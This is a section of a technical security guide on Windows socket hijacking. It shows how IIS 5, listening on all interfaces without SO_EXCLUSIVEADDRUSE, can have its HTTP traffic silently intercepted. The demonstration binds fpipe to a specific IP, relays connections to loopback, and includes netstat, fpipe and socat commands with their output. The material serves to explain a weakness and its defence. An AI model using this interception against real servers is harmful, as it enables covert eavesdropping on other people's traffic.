2.6.4. What happens when SO_EXCLUSIVEADDRUSE is not used?
Prev 2.6. Sockets binding and hijacking Next

2.6.4. What happens when SO_EXCLUSIVEADDRUSE is not used?

Even if Microsoft introduced the SO_EXCLUSIVEADDRUSE socket option in Windows NT 4.0 Service Pack 4, it seems that it was not used in some Microsoft application servers.

For instance, the HTTP server part of Internet Information Services (IIS) 5, shipped with Windows 2000, listens by default on all network interfaces on ports 80 and 443. It is possible to hijack the HTTP server of IIS 5 with a TCP server bound to the IP address of a specific interface.

Even more interesting, when a TCP server listens on all interfaces, it is possible to silently intercept TCP traffic, binding a second TCP server to intercept trafic and redirecting to the loopback address, to finally deliver date to the hijacked server (thanks to Franck Davy for suggesting this).

On a Windows 2000 server with IIS 5, the HTTP service listens on all interfaces: 

C:\WINNT\>netstat -an | find "80"
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING

Using fpipe, a second TCP server is bound to IPv4 address 192.70.106.142 and configured to redirect traffic to the loopback address (127.0.0.1), with TCP port 80 as destination: 

C:\WINNT\>fpipe -l 80 -r 80 -i 192.70.106.142 127.0.0.1 -v
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

Listening for TCP connections on 192.70.106.142 port 80

Using socat to send an HTTP query: 

jbm@garbarek ~> socat - tcp4:192.70.106.142:80
GET / HTTP/1.1
Host: localhost

The second server receives the connection on port 80 and redirect data to the IIS 5 server, using 127.0.0.1 as destination address: 

Connection accepted from 192.70.106.76 port 1077
Attempting to connect to 192.70.106.76 port 1077
Pipe connected:
   In:    192.70.106.76:1077  --> 192.70.106.142:80
  Out:   192.70.106.142:33014 --> 127.0.0.1:80
15 bytes received from inbound connection
16 bytes received from inbound connection
1 bytes received from inbound connection
273 bytes received from outbound connection
Outbound connection lost
Closing outbound connection
Closing inbound connection

Quit signal detected. Shutting down...

The TCP client finally receives data sent by the IIS5 server: 

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Thu, 22 May 2003 16:25:32 GMT
Connection: close
Content-Type: text/html
Content-Length: 111

[...]

Prev Up Next
2.6.3. Multiple sockets bindings Home 2.6.5. Windows services and drivers protected against socket hijacking